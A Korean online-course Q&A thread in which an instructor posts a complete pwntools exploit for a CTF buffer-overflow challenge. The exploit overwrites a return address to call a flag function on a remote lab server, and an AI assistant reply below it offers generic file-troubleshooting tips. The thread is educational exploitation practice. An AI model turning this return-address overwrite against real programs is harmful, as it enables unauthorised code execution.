인프런 커뮤니티 질문&답변

안녕하세요 poolchamp님!

CTF사이트 (https://hacktheworldctf.xyz/challenges#BasicBOF-2) 에서 제공하는 .zip 파일은 문제파일입니다.

말씀해주신 .py 파이썬 파일은 답안지 파일이라고 생각해주시면 됩니다.

아래와 같은 익스플로잇 코드를 .zip 파일에서 제공한 폴더에 basic_bof.py 라는 파이썬 파일(꼭 해당 이름일 필요는 없음) 을 생성한 후, 복사 봍여넣기해서 사용하시면 됩니다 !

from pwn import *
context.log_level = 'debug'

p = process("./basic_bof")
p = remote("101.79.9.58", 10010)

# gdb.attach(p)
# pause()

# exploit here
get_flag_addr = 0x401296

payload = b'A'*0x30
payload += b'B'*0x8
payload += p64(get_flag_addr)

p.sendline(payload)
p.interactive()

질문 내용을 통해 유추해보건데, 이미 강의의 끝부분인 14. 익스플로잇 코드작성 (StackBufferOverFlow를 이용한 RET Overwrite)을 수강해주고 계신 것으로 추측됩니다.

아래에 첨부된 코드는 해당 강의 수업노트에서 확인하실 수 있으니, 참고해주시면 도움이 될 것 같습니다!

늘 열심히 공부해주셔서 감사합니다!

안녕하세요, 인프런 AI 인턴입니다.
poolchamp님, 압축파일을 해제했는데 필요한 Python 파일이 없다면 몇 가지 가능성을 점검해볼 수 있습니다.

1. 압축파일의 내용 확인: 압축파일을 제대로 해제했는지 다시 한 번 확인해주세요. 파일들이 특정 폴더에 있는지 혹은 압축해제 도중 문제가 발생했을 수 있습니다.

2. 강의 자료 확인: 강의 자료에 정확한 파일이 포함되어 있는지, 혹은 압축 파일이 올바르게 다운로드 되었는지를 점검하실 수 있습니다. 강의 자료는 인프런 강의 페이지에서 “커리큘럼 탭 하단 수업자료 버튼”이나, “플레이어 하단의 수업 자료 버튼”을 클릭하여 확인할 수 있습니다. 강의 자료 관련 FAQ를 참고해주세요.

3. 강사님 또는 강의 문의: 해당 강좌의 질문 게시판이나, 제공된 커뮤니티 공간을 활용하세요. 같은 문제를 겪는 다른 수강생들의 질문을 찾거나 질문을 직접 남겨보는 것도 좋은 방법입니다.

이 방법들도 시도해 보시고 문제가 지속될 경우, 강사님께 직접 문의하여 해당 파일이 필요한지 확인하시면 좋겠습니다. 도움 되시길 바랍니다!